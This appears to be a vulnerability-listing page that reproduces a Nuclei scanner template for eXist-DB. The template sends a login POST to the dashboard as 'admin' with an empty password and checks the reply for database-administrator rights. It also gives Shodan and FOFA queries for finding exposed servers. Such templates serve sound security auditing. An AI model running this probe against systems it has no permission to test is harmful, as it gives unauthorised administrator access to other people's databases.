漏洞描述
Detects eXist DB dashboard login endpoint access. eXist DB is a document-oriented database that allows you to store and query XML data. The dashboard is a web interface that allows you to manage the database and view the data.
exist-db-dashboard-access: eXist-DB Dashboard Access
PoC代码[已公开]
id: exist-db-dashboard-access
info:
name: eXist-DB Dashboard Access
author: ritikchaddha
severity: high
description: Detects eXist DB dashboard login endpoint access. eXist DB is a document-oriented database that allows you to store and query XML data. The dashboard is a web interface that allows you to manage the database and view the data.
reference:
- https://exist-db.org/
metadata:
verified: true
max-request: 2
shodan-query: title:"eXist db"
fofa-query: title="eXist db"
tags: misconfig,exist-db,dashboard,login,exposure
variables:
username: "admin"
http:
- raw:
- |
POST /exist/apps/dashboard/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&password=
matchers-condition: and
matchers:
- type: regex
regex:
- 'user"\s*:\s*"admin"'
- 'dba"\s*:\s*"true"'
condition: and
- type: word
part: content_type
words:
- "application/xml"
- type: status
status:
- 200
# digest: 4b0a00483046022100fddba794b09ce14b35e7470b22966cd09e888b75175b83bfa08de63754ab238f022100916b037ae20c98038517e77b4abd1c9576183628c556590cdcc80f9df34e7e1f:922c64590222798bb761d5b6d8e72950